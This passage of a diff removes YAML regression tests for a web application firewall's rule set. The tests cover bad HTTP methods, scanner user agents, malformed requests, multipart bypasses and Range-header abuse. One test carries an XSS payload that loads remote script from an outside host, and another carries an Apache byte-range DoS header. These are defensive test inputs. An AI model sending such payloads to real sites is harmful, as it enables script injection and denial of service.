port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
- test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"


@ -1,84 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
- test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"


@ -1,43 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
- test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
- test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"


@ -1,55 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
- test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"


@ -1,256 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
- # Standard GET request
test_title: 920100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: [400]
- # Perfectly valid OPTIONS request
test_title: 920100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
- # invalid Connect request, domains require ports
test_title: 920100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: [400]
- # This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # Valid request with query and anchor components
test_title: 920100-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
- # Normal Options request with path
test_title: 920100-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # An invalid method with a long name
test_title: 920100-10
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
- test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: [400]
- test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
- test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
- test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"


@ -1,105 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
- test_title: 920120-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data: |
----------397236876
Content-Disposition: form-data; name="fileRap"; filename="file=.txt"
Content-Type: text/plain
555-555-0199@example.com
----------397236876--
protocol: "http"
output:
log_contains: "id \"920120\""
- test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data: |
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="fi=le"; filename="test"
Content-Type: text/plain
email: security@modsecurity.org
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="note"
Contact info.
-----------------------------627652292512397580456702590--
output:
log_contains: id "920120"
- test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
-----------------------------265001916915724
Content-Disposition: form-data; name="fi;le"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
t2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
output:
log_contains: id "920120"


@ -1,106 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
- # Non digit Content-Length without content-type
test_title: 920160-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Non digit content-length with content-type
test_title: 920160-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Mixed digit and non digit content length
test_title: 920160-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: [400]
- # Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /post
version: HTTP/1.0
data: abc
output:
status: [200]
no_log_contains: id "920160"
- test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"


@ -1,115 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
- # POST Request with data (valid)
test_title: 920170-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with data
test_title: 920170-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # Head Request with data
test_title: 920170-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with content length 0 and no data.
test_title: 920170-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"


@ -1,82 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
- test_title: 920180-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
log_contains: id "920180"
- test_title: 920180-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
- test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
- test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"


@ -1,33 +0,0 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
- test_title: 920181-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data: |
7
foo=bar
0
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"


@ -1,44 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
- test_title: 920190-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
- test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"


@ -1,150 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
- test_title: 920200-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
- # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
- test_title: 920200-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
- test_title: 920200-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
- test_title: 920200-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
- test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
- test_title: 920200-7
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
- test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
- test_title: 920200-9
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
- test_title: 920200-10
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"


@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
- test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"


@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920202.yaml"
description: "Tests for 920202"
tests:
- test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"


@ -1,109 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
- test_title: 920210-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-2
